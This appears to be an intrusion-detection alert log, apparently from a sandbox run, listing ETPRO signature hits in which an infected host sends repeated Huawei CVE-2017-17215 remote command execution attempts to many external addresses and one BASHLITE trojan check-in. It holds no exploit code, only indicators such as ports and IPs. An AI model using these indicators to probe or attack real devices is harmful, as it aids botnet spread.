                                                        06/13/24-21:32:01.241520TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4596237215192.168.2.14197.54.64.37
                                                        06/13/24-21:31:59.199995TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4466037215192.168.2.14156.234.131.16
                                                        06/13/24-21:33:07.060312TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4299437215192.168.2.14197.239.141.65
                                                        06/13/24-21:32:38.298538TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4048037215192.168.2.14156.255.58.247
                                                        06/13/24-21:32:05.371345TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4978037215192.168.2.1441.97.114.105
                                                        06/13/24-21:32:50.633428TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3583837215192.168.2.1441.235.148.210
                                                        06/13/24-21:32:11.509450TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5724237215192.168.2.14197.135.124.50
                                                        06/13/24-21:32:15.608253TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4850237215192.168.2.1441.142.142.204
                                                        06/13/24-21:32:19.726956TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4692037215192.168.2.14156.170.125.73
                                                        06/13/24-21:32:38.300352TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5286437215192.168.2.1441.181.85.156
                                                        06/13/24-21:32:21.782146TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5288037215192.168.2.14156.243.145.182
                                                        06/13/24-21:32:40.376038TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5690837215192.168.2.14197.2.250.188
                                                        06/13/24-21:32:05.347002TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4350837215192.168.2.14156.25.61.31
                                                        06/13/24-21:32:34.215964TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5971637215192.168.2.14156.184.138.170
                                                        06/13/24-21:32:15.605334TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5649237215192.168.2.14156.32.65.133
                                                        06/13/24-21:33:09.106086TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3357437215192.168.2.14156.48.142.226
                                                        06/13/24-21:32:03.280074TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4562237215192.168.2.1441.117.110.130
                                                        06/13/24-21:32:56.755988TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5674637215192.168.2.1441.218.25.216
                                                        06/13/24-21:32:15.604098TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3832237215192.168.2.1441.172.158.8
                                                        06/13/24-21:32:36.262323TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3475837215192.168.2.14197.210.225.41
                                                        06/13/24-21:32:42.407836TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6026437215192.168.2.14156.2.110.234
                                                        06/13/24-21:32:09.458402TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5439437215192.168.2.14197.98.141.69
                                                        06/13/24-21:32:21.783162TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3469437215192.168.2.14156.36.123.19
                                                        06/13/24-21:33:04.987476TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4879037215192.168.2.14197.89.186.98
                                                        06/13/24-21:32:13.564016TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5440637215192.168.2.14197.17.167.33
                                                        06/13/24-21:32:30.092029TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4982037215192.168.2.14197.179.77.76
                                                        06/13/24-21:33:07.042013TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6095837215192.168.2.14156.85.217.109
                                                        06/13/24-21:33:04.991637TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5087637215192.168.2.1441.36.123.22
                                                        06/13/24-21:32:11.485595TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4558437215192.168.2.14197.184.92.194
                                                        06/13/24-21:32:28.026291TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5297837215192.168.2.14156.222.166.118
                                                        06/13/24-21:32:11.487642TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4976037215192.168.2.14197.120.222.20
                                                        06/13/24-21:33:07.040960TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3432437215192.168.2.1441.152.200.240
                                                        06/13/24-21:32:23.943474TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5716837215192.168.2.1441.109.58.28
                                                        06/13/24-21:33:02.908828TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3324237215192.168.2.14156.75.224.225
                                                        06/13/24-21:32:43.532472TCP2840515ETPRO TROJAN ELF/BASHLITE Variant Reporting Arch Type (i586)340964554192.168.2.14103.82.38.94
                                                        06/13/24-21:32:38.301355TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4010437215192.168.2.14197.12.129.208
                                                        06/13/24-21:32:01.223595TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4992037215192.168.2.1441.128.10.150
                                                        06/13/24-21:32:07.418210TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4953437215192.168.2.14197.11.119.198
                                                        06/13/24-21:33:02.936686TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4681437215192.168.2.14197.29.84.164
                                                        06/13/24-21:32:50.610755TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5296037215192.168.2.1441.143.206.228
                                                        06/13/24-21:33:17.310604TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4822437215192.168.2.14156.100.175.11
                                                        06/13/24-21:32:34.192769TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5450037215192.168.2.14197.80.39.203
                                                        06/13/24-21:32:01.237595TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6074437215192.168.2.1441.112.83.38
                                                        06/13/24-21:32:28.025981TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5355837215192.168.2.14197.151.147.106
                                                        06/13/24-21:32:34.195343TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5707837215192.168.2.14197.48.124.152
                                                        06/13/24-21:32:40.357601TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4142637215192.168.2.1441.103.59.233
                                                        06/13/24-21:33:17.341153TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3481437215192.168.2.1441.171.152.158
                                                        06/13/24-21:32:21.805058TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4438637215192.168.2.14197.240.241.141
                                                        06/13/24-21:31:57.136200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5594637215192.168.2.1441.156.160.87
                                                        06/13/24-21:32:52.670530TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3537437215192.168.2.14197.179.20.198
                                                        06/13/24-21:33:15.257515TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5155237215192.168.2.14197.157.178.49
                                                        06/13/24-21:32:07.419782TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3417037215192.168.2.14156.143.137.119
                                                        06/13/24-21:32:36.266390TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5664837215192.168.2.1441.202.114.157
                                                        06/13/24-21:33:11.157894TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4608437215192.168.2.14156.22.150.91
                                                        06/13/24-21:32:05.344454TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5443837215192.168.2.14197.75.16.75
                                                        06/13/24-21:32:30.075812TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5959237215192.168.2.14156.61.0.245
                                                        06/13/24-21:32:21.803267TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3937437215192.168.2.14197.190.255.96
                                                        06/13/24-21:33:11.173222TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5783837215192.168.2.1441.15.229.28
                                                        06/13/24-21:32:52.680897TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4373237215192.168.2.1441.63.176.35
                                                        06/13/24-21:32:21.779948TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5912837215192.168.2.1441.152.82.64
                                                        06/13/24-21:32:21.805017TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4443037215192.168.2.14156.199.229.223
                                                        06/13/24-21:32:36.263347TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5349437215192.168.2.14197.212.239.205
                                                        06/13/24-21:33:11.160377TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3840637215192.168.2.1441.138.187.58
                                                        06/13/24-21:31:59.194797TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3311037215192.168.2.1441.112.54.198
                                                        06/13/24-21:32:42.407077TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3506437215192.168.2.1441.209.213.218
                                                        06/13/24-21:33:13.227136TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4199237215192.168.2.14156.107.103.52
                                                        06/13/24-21:32:38.316948TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4844637215192.168.2.14197.141.149.150
                                                        06/13/24-21:32:52.656850TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3948237215192.168.2.1441.123.169.96
                                                        06/13/24-21:33:09.090200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4032037215192.168.2.14197.233.47.100
                                                        06/13/24-21:32:03.273712TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5501237215192.168.2.1441.233.24.79
                                                        06/13/24-21:32:40.354202TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4786637215192.168.2.1441.207.218.140
                                                        06/13/24-21:32:25.992194TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4144637215192.168.2.1441.144.203.227
                                                        06/13/24-21:32:58.824074TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6066837215192.168.2.14156.194.151.71
                                                        06/13/24-21:32:56.786802TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4382637215192.168.2.14197.166.126.3
                                                        06/13/24-21:33:07.038329TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4408037215192.168.2.1441.123.115.249
                                                        06/13/24-21:32:13.546377TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5708037215192.168.2.1441.83.115.177
                                                        06/13/24-21:32:09.436997TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4726237215192.168.2.14156.166.222.40
                                                        06/13/24-21:32:19.752335TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4511437215192.168.2.14197.216.157.199
                                                        06/13/24-21:32:52.655974TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4772237215192.168.2.1441.88.68.153
                                                        06/13/24-21:32:48.554254TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3904637215192.168.2.14197.167.237.174
                                                        06/13/24-21:33:05.017157TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3620837215192.168.2.14156.146.11.155
                                                        06/13/24-21:32:52.659525TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4486437215192.168.2.14197.251.83.132
                                                        06/13/24-21:32:19.728646TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5926837215192.168.2.1441.30.151.218
                                                        06/13/24-21:32:11.488903TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4701637215192.168.2.14197.191.173.171
                                                        06/13/24-21:32:01.222481TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4717037215192.168.2.14197.102.59.48
                                                        06/13/24-21:33:02.911151TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4071637215192.168.2.1441.235.245.157
                                                        06/13/24-21:33:11.181001TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3615837215192.168.2.1441.21.178.141
                                                        06/13/24-21:32:42.403743TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4262437215192.168.2.14156.212.72.3
                                                        06/13/24-21:32:28.027536TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3483237215192.168.2.1441.59.143.221
                                                        06/13/24-21:32:38.323137TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4757237215192.168.2.14156.22.64.32
                                                        06/13/24-21:32:48.554838TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5197837215192.168.2.1441.147.104.63
                                                        06/13/24-21:33:09.131299TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4332237215192.168.2.14156.20.119.138
                                                        06/13/24-21:31:59.177305TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4679637215192.168.2.1441.134.130.152
                                                        06/13/24-21:32:44.475279TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4181237215192.168.2.14197.185.126.21
                                                        06/13/24-21:33:07.060727TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6006237215192.168.2.14156.230.66.147
                                                        06/13/24-21:33:04.989207TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5955237215192.168.2.1441.26.33.9
                                                        06/13/24-21:33:17.340220TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3982037215192.168.2.14156.232.199.61
                                                        06/13/24-21:31:57.134406TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3348037215192.168.2.14156.81.17.31
                                                        06/13/24-21:32:11.507348TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4721437215192.168.2.14156.160.72.159
                                                        06/13/24-21:32:34.212973TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4949037215192.168.2.14156.218.18.189
                                                        06/13/24-21:32:13.545672TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5123837215192.168.2.1441.96.24.6
                                                        06/13/24-21:32:32.152411TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3548237215192.168.2.1441.8.36.127
                                                        06/13/24-21:33:00.888792TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6035237215192.168.2.1441.152.230.141
                                                        06/13/24-21:32:30.123959TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3689037215192.168.2.14197.200.235.6
                                                        06/13/24-21:32:01.240921TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4505437215192.168.2.14197.68.134.58
                                                        06/13/24-21:32:11.487221TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4745637215192.168.2.14156.91.153.8
                                                        06/13/24-21:33:11.156047TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5028637215192.168.2.14156.247.106.172
                                                        06/13/24-21:32:15.638360TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4652637215192.168.2.1441.10.161.159
                                                        06/13/24-21:32:25.972802TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4280237215192.168.2.14197.239.237.116
                                                        06/13/24-21:32:15.630295TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5639237215192.168.2.1441.196.109.15
                                                        06/13/24-21:33:09.102257TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3423837215192.168.2.1441.232.14.166
                                                        06/13/24-21:32:09.459991TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5769837215192.168.2.1441.112.156.86
                                                        06/13/24-21:33:09.111621TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5015837215192.168.2.14197.201.44.97
                                                        06/13/24-21:33:07.039833TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4326037215192.168.2.14197.199.81.2
                                                        06/13/24-21:32:17.675510TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3966437215192.168.2.14197.47.120.228
                                                        06/13/24-21:33:13.213170TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5177037215192.168.2.14197.82.202.97
                                                        06/13/24-21:31:59.176400TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4989437215192.168.2.1441.146.178.217
                                                        06/13/24-21:32:48.573490TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5604037215192.168.2.14156.240.125.211
                                                        06/13/24-21:32:38.300838TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5980837215192.168.2.14197.251.120.20
                                                        06/13/24-21:32:50.614261TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5526237215192.168.2.1441.197.246.100
                                                        06/13/24-21:32:23.944072TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5584437215192.168.2.14156.47.77.218
                                                        06/13/24-21:32:50.617831TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5122637215192.168.2.14156.224.133.219
                                                        06/13/24-21:32:28.027894TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4334437215192.168.2.1441.57.158.161
                                                        06/13/24-21:32:13.544806TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4575237215192.168.2.14197.52.135.96
                                                        06/13/24-21:32:44.453829TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4599237215192.168.2.14197.120.70.7
                                                        06/13/24-21:33:13.212547TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4177437215192.168.2.14156.127.236.58
                                                        06/13/24-21:32:13.564887TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4341437215192.168.2.14156.136.78.121
                                                        06/13/24-21:32:30.124746TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3398437215192.168.2.1441.19.94.44
                                                        06/13/24-21:32:21.784767TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5937037215192.168.2.14156.117.6.135
                                                        06/13/24-21:33:15.253350TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5358037215192.168.2.14156.62.176.74
                                                        06/13/24-21:32:54.725027TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3793437215192.168.2.14197.13.254.178
                                                        06/13/24-21:31:57.153517TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4688637215192.168.2.14197.218.26.77
                                                        06/13/24-21:32:03.305823TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3606037215192.168.2.14156.198.37.143
                                                        06/13/24-21:32:03.274054TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5534237215192.168.2.14156.18.235.240
                                                        06/13/24-21:32:01.241207TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4215837215192.168.2.14197.29.202.116
                                                        06/13/24-21:32:38.301964TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5702037215192.168.2.1441.156.164.118
                                                        06/13/24-21:31:57.137730TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3748637215192.168.2.14197.117.53.251
                                                        06/13/24-21:32:19.753286TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4080837215192.168.2.14156.23.144.109
                                                        06/13/24-21:32:21.787787TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4386237215192.168.2.1441.107.16.175
                                                        06/13/24-21:31:57.130958TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5528037215192.168.2.14156.88.26.137
                                                        06/13/24-21:32:03.276628TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5808837215192.168.2.1441.120.240.25
                                                        06/13/24-21:32:40.357343TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3792237215192.168.2.1441.30.65.126
                                                        06/13/24-21:32:23.937176TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4202637215192.168.2.14197.244.225.135
                                                        06/13/24-21:32:40.359291TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4899237215192.168.2.1441.118.118.65
                                                        06/13/24-21:32:50.617805TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4047437215192.168.2.1441.57.215.63
                                                        06/13/24-21:32:07.416500TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4915837215192.168.2.14197.2.5.136
                                                        06/13/24-21:32:58.840166TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4735837215192.168.2.14156.205.249.71
                                                        06/13/24-21:32:01.247922TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5575837215192.168.2.1441.192.118.90
                                                        06/13/24-21:32:11.487537TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3977837215192.168.2.1441.36.166.239
                                                        06/13/24-21:32:30.123787TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4974437215192.168.2.14197.217.17.183
                                                        06/13/24-21:32:03.278695TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3390037215192.168.2.1441.38.56.45
                                                        06/13/24-21:33:09.130392TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4555437215192.168.2.1441.213.89.2
                                                        06/13/24-21:32:11.486083TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3422037215192.168.2.1441.242.249.185
                                                        06/13/24-21:32:42.418571TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3701837215192.168.2.14156.117.203.50
                                                        06/13/24-21:32:03.278055TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3690637215192.168.2.14156.184.236.36
                                                        06/13/24-21:32:25.978833TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4128837215192.168.2.14197.139.143.11
                                                        06/13/24-21:32:21.801370TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3561437215192.168.2.1441.186.29.196
                                                        06/13/24-21:32:40.371972TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5258237215192.168.2.1441.25.232.29
                                                        06/13/24-21:31:57.092009TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4893237215192.168.2.1441.128.35.59
                                                        06/13/24-21:32:09.456989TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4910837215192.168.2.14197.52.24.0
                                                        06/13/24-21:33:11.174782TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5564037215192.168.2.1441.252.134.139
                                                        06/13/24-21:33:17.308164TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4016037215192.168.2.1441.212.248.159
                                                        06/13/24-21:32:07.416848TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3296437215192.168.2.14156.169.150.109
                                                        06/13/24-21:32:19.728732TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4765037215192.168.2.14197.226.22.167
                                                        06/13/24-21:32:09.440774TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3714037215192.168.2.14156.197.194.143
                                                        06/13/24-21:33:07.060795TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3711837215192.168.2.14156.240.193.52
                                                        06/13/24-21:32:44.480064TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4140837215192.168.2.14197.37.53.201
                                                        06/13/24-21:32:15.632837TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3425237215192.168.2.14197.35.158.215
                                                        06/13/24-21:33:05.012216TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3478637215192.168.2.1441.185.230.46
                                                        06/13/24-21:33:02.913599TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5381437215192.168.2.14197.210.78.42
                                                        06/13/24-21:31:59.195005TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5673237215192.168.2.14156.156.109.129
                                                        06/13/24-21:32:17.676382TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5623637215192.168.2.14197.191.124.123
                                                        06/13/24-21:33:00.884403TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4826437215192.168.2.14197.32.101.186
                                                        06/13/24-21:32:13.568996TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3384037215192.168.2.1441.238.200.197
                                                        06/13/24-21:32:54.726152TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5570437215192.168.2.14197.118.56.240
                                                        06/13/24-21:32:56.756872TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5080837215192.168.2.14156.89.246.103
                                                        06/13/24-21:32:38.301142TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4999437215192.168.2.1441.42.140.64
                                                        06/13/24-21:31:57.093613TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5498837215192.168.2.1441.218.92.40
                                                        06/13/24-21:32:38.303018TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4452637215192.168.2.14156.81.52.177
                                                        06/13/24-21:32:07.404551TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3457637215192.168.2.14156.106.210.4
                                                        06/13/24-21:33:02.912723TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3598837215192.168.2.14156.224.129.233
                                                        06/13/24-21:32:15.605278TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5322637215192.168.2.1441.105.87.107
                                                        06/13/24-21:32:46.503562TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4375437215192.168.2.14156.135.107.41
                                                        06/13/24-21:32:46.502189TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5650837215192.168.2.1441.172.223.195
                                                        06/13/24-21:32:13.547165TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5690237215192.168.2.14156.178.176.18
                                                        06/13/24-21:31:59.177577TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5475037215192.168.2.14156.146.188.155
                                                        06/13/24-21:32:11.507741TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5886037215192.168.2.14197.196.132.11
